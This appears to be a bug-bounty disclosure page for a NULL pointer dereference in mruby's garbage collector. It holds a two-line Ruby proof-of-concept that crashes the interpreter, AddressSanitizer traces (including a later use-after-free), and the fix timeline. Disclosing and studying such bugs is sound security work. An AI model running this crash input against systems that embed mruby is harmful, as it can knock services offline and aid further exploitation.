NULL Pointer Dereference in mruby/mruby

Valid

Reported on

Dec 10th 2021


Description

NULL Pointer Dereference in mrb_full_gc

Proof of Concept

( *a = () )
a.<<.take_while{ a.drop_while {Enumerable ; a<<lambda {}}}

Result

./master/asan_mruby/bin/mirb ./crash.rb
mirb - Embeddable Interactive Ruby Shell

 => nil
AddressSanitizer:DEADLYSIGNAL
=================================================================
==21352==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000018 (pc 0x556b44382444 bp 0x7fff4e9961d0 sp 0x7fff4e9961b0 T0)
==21352==The signal is caused by a READ memory access.
==21352==Hint: address points to the zero page.
    #0 0x556b44382443 in mrb_full_gc /root/master/asan_mruby/src/gc.c:1317
    #1 0x556b4438276b in mrb_garbage_collect /root/master/asan_mruby/src/gc.c:1350
    #2 0x556b44386737 in mrb_irep_incref /root/master/asan_mruby/src/state.c:114
    #3 0x556b4444780a in mrb_proc_copy /root/master/asan_mruby/src/proc.c:213
    #4 0x556b44448162 in proc_lambda /root/master/asan_mruby/src/proc.c:284
    #5 0x556b4439f98c in mrb_vm_exec /root/master/asan_mruby/src/vm.c:1637
    #6 0x556b44391018 in mrb_vm_run /root/master/asan_mruby/src/vm.c:1091
    #7 0x556b443034eb in main /root/master/asan_mruby/mrbgems/mruby-bin-mirb/tools/mirb/mirb.c:670
    #8 0x7f192ee230b2 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x270b2)
    #9 0x556b4430048d in _start (/root/master/asan_mruby/bin/mirb+0xbe48d)

AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV /root/master/asan_mruby/src/gc.c:1317 in mrb_full_gc
==21352==ABORTING
We are processing your report and will contact the mruby team within 24 hours. 5 months ago
We have contacted a member of the mruby team and are waiting to hear back 5 months ago
Yukihiro "Matz" Matsumoto validated this vulnerability 5 months ago
felling good man has been awarded the disclosure bounty
The fix bounty is now up for grabs
Yukihiro "Matz" Matsumoto confirmed that a fix has been merged on f5e10c 5 months ago
Yukihiro "Matz" Matsumoto has been awarded the fix bounty
felling
5 months ago

Researcher


Hi @Matz, Look like your fix is incomplete.

mruby/bin/mirb test.rb
mirb - Embeddable Interactive Ruby Shell

 => nil
too many irep references (RuntimeError)
=================================================================
==4326==ERROR: AddressSanitizer: heap-use-after-free on address 0x6070000003a6 at pc 0x555880ee8b49 bp 0x7ffd45311cb0 sp 0x7ffd45311ca0
READ of size 1 at 0x6070000003a6 thread T0
    #0 0x555880ee8b48 in mrb_irep_cutref /root/master/asan_mruby/src/state.c:138
    #1 0x555880ee2170 in obj_free /root/master/asan_mruby/src/gc.c:871
    #2 0x555880edf78c in free_heap /root/master/asan_mruby/src/gc.c:433
    #3 0x555880edf7e4 in mrb_gc_destroy /root/master/asan_mruby/src/gc.c:442
    #4 0x555880ee928d in mrb_close /root/master/asan_mruby/src/state.c:195
    #5 0x555880e659c6 in main /root/master/asan_mruby/mrbgems/mruby-bin-mirb/tools/mirb/mirb.c:713
    #6 0x7fa03c6cd0b2 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x270b2)
    #7 0x555880e6248d in _start (/root/master/asan_mruby/bin/mirb+0xbf48d)

0x6070000003a6 is located 6 bytes inside of 72-byte region [0x6070000003a0,0x6070000003e8)
freed by thread T0 here:
    #0 0x7fa03caf47cf in __interceptor_free (/lib/x86_64-linux-gnu/libasan.so.5+0x10d7cf)
    #1 0x555880ee87a3 in mrb_default_allocf /root/master/asan_mruby/src/state.c:64
    #2 0x555880edeb69 in mrb_free /root/master/asan_mruby/src/gc.c:288
    #3 0x555880ee9198 in mrb_irep_free /root/master/asan_mruby/src/state.c:174
    #4 0x555880ee8af7 in mrb_irep_decref /root/master/asan_mruby/src/state.c:128
    #5 0x555880ee2183 in obj_free /root/master/asan_mruby/src/gc.c:873
    #6 0x555880edf78c in free_heap /root/master/asan_mruby/src/gc.c:433
    #7 0x555880edf7e4 in mrb_gc_destroy /root/master/asan_mruby/src/gc.c:442
    #8 0x555880ee928d in mrb_close /root/master/asan_mruby/src/state.c:195
    #9 0x555880e659c6 in main /root/master/asan_mruby/mrbgems/mruby-bin-mirb/tools/mirb/mirb.c:713
    #10 0x7fa03c6cd0b2 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x270b2)

previously allocated by thread T0 here:
    #0 0x7fa03caf4ffe in __interceptor_realloc (/lib/x86_64-linux-gnu/libasan.so.5+0x10dffe)
    #1 0x555880ee87bd in mrb_default_allocf /root/master/asan_mruby/src/state.c:68
    #2 0x555880ede83e in mrb_realloc_simple /root/master/asan_mruby/src/gc.c:226
    #3 0x555880ede940 in mrb_realloc /root/master/asan_mruby/src/gc.c:240
    #4 0x555880edea2d in mrb_malloc /root/master/asan_mruby/src/gc.c:256
    #5 0x555880ee931a in mrb_add_irep /root/master/asan_mruby/src/state.c:208
    #6 0x555880f69f00 in scope_add_irep /root/master/asan_mruby/mrbgems/mruby-compiler/core/codegen.c:3641
    #7 0x555880f6a361 in scope_new /root/master/asan_mruby/mrbgems/mruby-compiler/core/codegen.c:3671
    #8 0x555880f592b8 in lambda_body /root/master/asan_mruby/mrbgems/mruby-compiler/core/codegen.c:1294
    #9 0x555880f5f870 in codegen /root/master/asan_mruby/mrbgems/mruby-compiler/core/codegen.c:2261
    #10 0x555880f5be84 in gen_call /root/master/asan_mruby/mrbgems/mruby-compiler/core/codegen.c:1708
    #11 0x555880f612e2 in codegen /root/master/asan_mruby/mrbgems/mruby-compiler/core/codegen.c:2499
    #12 0x555880f5b006 in gen_values /root/master/asan_mruby/mrbgems/mruby-compiler/core/codegen.c:1563
    #13 0x555880f5ba5c in gen_call /root/master/asan_mruby/mrbgems/mruby-compiler/core/codegen.c:1668
    #14 0x555880f612e2 in codegen /root/master/asan_mruby/mrbgems/mruby-compiler/core/codegen.c:2499
    #15 0x555880f5e794 in codegen /root/master/asan_mruby/mrbgems/mruby-compiler/core/codegen.c:2126
    #16 0x555880f5a5ef in lambda_body /root/master/asan_mruby/mrbgems/mruby-compiler/core/codegen.c:1456
    #17 0x555880f5f870 in codegen /root/master/asan_mruby/mrbgems/mruby-compiler/core/codegen.c:2261
    #18 0x555880f5be84 in gen_call /root/master/asan_mruby/mrbgems/mruby-compiler/core/codegen.c:1708
    #19 0x555880f612e2 in codegen /root/master/asan_mruby/mrbgems/mruby-compiler/core/codegen.c:2499
    #20 0x555880f5e794 in codegen /root/master/asan_mruby/mrbgems/mruby-compiler/core/codegen.c:2126
    #21 0x555880f5a5ef in lambda_body /root/master/asan_mruby/mrbgems/mruby-compiler/core/codegen.c:1456
    #22 0x555880f5f870 in codegen /root/master/asan_mruby/mrbgems/mruby-compiler/core/codegen.c:2261
    #23 0x555880f5be84 in gen_call /root/master/asan_mruby/mrbgems/mruby-compiler/core/codegen.c:1708
    #24 0x555880f612e2 in codegen /root/master/asan_mruby/mrbgems/mruby-compiler/core/codegen.c:2499
    #25 0x555880f5e794 in codegen /root/master/asan_mruby/mrbgems/mruby-compiler/core/codegen.c:2126
    #26 0x555880f5a801 in scope_body /root/master/asan_mruby/mrbgems/mruby-compiler/core/codegen.c:1473
    #27 0x555880f612ae in codegen /root/master/asan_mruby/mrbgems/mruby-compiler/core/codegen.c:2494
    #28 0x555880f6c43d in generate_code /root/master/asan_mruby/mrbgems/mruby-compiler/core/codegen.c:3888
    #29 0x555880f6c815 in mrb_generate_code /root/master/asan_mruby/mrbgems/mruby-compiler/core/codegen.c:3911

SUMMARY: AddressSanitizer: heap-use-after-free /root/master/asan_mruby/src/state.c:138 in mrb_irep_cutref
Shadow bytes around the buggy address:
  0x0c0e7fff8020: fd fd fd fd fd fd fd fd fd fd fa fa fa fa fd fd
  0x0c0e7fff8030: fd fd fd fd fd fd fd fa fa fa fa fa fd fd fd fd
  0x0c0e7fff8040: fd fd fd fd fd fa fa fa fa fa fd fd fd fd fd fd
  0x0c0e7fff8050: fd fd fd fa fa fa fa fa fd fd fd fd fd fd fd fd
  0x0c0e7fff8060: fd fa fa fa fa fa fd fd fd fd fd fd fd fd fd fa
=>0x0c0e7fff8070: fa fa fa fa[fd]fd fd fd fd fd fd fd fd fa fa fa
  0x0c0e7fff8080: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c0e7fff8090: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c0e7fff80a0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c0e7fff80b0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c0e7fff80c0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07
  Heap left redzone:       fa
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb
  Shadow gap:              cc
==4326==ABORTING
Robert Scott
a month ago

@matz can confirm this is still not fixed in 3.1.0-rc2

Robert Scott
a month ago

^ Disregard this. What presumably happened is the followup to this became https://huntr.dev/bounties/59a70392-4864-4ce3-8e35-6ac2111d1e2e/

to join this conversation